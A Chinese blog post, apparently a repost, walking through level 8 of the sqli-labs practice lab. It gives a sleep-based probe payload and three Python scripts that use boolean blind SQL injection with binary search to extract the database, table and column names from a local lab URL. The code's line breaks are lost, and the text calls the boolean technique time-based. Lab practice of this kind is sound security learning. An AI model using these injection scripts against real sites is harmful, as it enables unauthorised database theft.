当前位置：首页 > news >正文

sqlilabs第八关

news 2025/8/30 4:22:25

?id=1' and sleep(2)--+

发现页面存在注点，使用时间盲注脚本进行注入---

import requestsdef inject_database(url):name = ''   #name用于存储猜测出的数据库名称 for i in range(1, 20):  # 假设数据库名称长度不超过20low = 48  # '0'high = 122  # 'z'middle = (low + high) // 2   /*low, high, middle 用于二分查找(内层循环使用二分查找法猜测每个字符的ASCII值)*/while low < high:#构造Payload: payload是SQL注入的有效载荷,尝试猜测当前字符的ASCII值payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)params = {"id": payload}r = requests.get(url, params=params) # 判断注入是否成功，依据靶场的返回信息if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容，表示成功low = middle + 1else:high = middlemiddle = (low + high) // 2 # 只拼接有效字符，跳过空格（ASCII 32）和其他非打印字符if middle > 32:  # 跳过空格和不可打印字符name += chr(middle)print(f"Current database name: {name}")low = 48high = 122middle = (low + high) // 2print(f"Final database name: {name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"inject_database(url)

用一个布尔盲注攻击，从数据库中提取表名

-循环遍历表名的每个字符

-二分查找法：通过ASCII码范围（48到122）进行二分查找，确定每个字符的值

-构造SQL注入Payload：利用substr函数和ascii函数逐字符比较表名的ASCII值

-发送请求并判断结果

-跳过空格和非打印字符：只拼接有效的字符

import requestsdef inject_table_name(url, database_name):table_name = ''for i in range(1, 20):  low = 48  # '0'high = 122  # 'z'middle = (low + high) // 2while low < high:# payloadpayload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "params = {"id": payload}r = requests.get(url, params=params)if 'You are in' in r.text:  low = middle + 1else:high = middlemiddle = (low + high) // 2if middle > 32:  # 跳过空格和不可打印字符table_name += chr(middle)print(table_name)low = 48high = 122middle = (low + high) // 2print(f"Final table name: {table_name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  database_name = "security"  # 目标数据库名称inject_table_name(url, database_name)

通过payload猜测数据库表的列名

import requestsdef inject_column_name(url, database_name, table_name):column_name = ''for i in range(1, 20): low = 48  # '0'high = 122  # 'z'middle = (low + high) // 2while low < high:payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "params = {"id": payload}r = requests.get(url, params=params)if 'You are in' in r.text:  low = middle + 1else:high = middlemiddle = (low + high) // 2if middle > 32: column_name += chr(middle)print(column_name)low = 48high = 122middle = (low + high) // 2print(f"Final column name: {column_name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  database_name = "security"  table_name = "users"  # 目标表名inject_column_name(url, database_name, table_name)

查看全文

http://www.lryc.cn/news/536152.html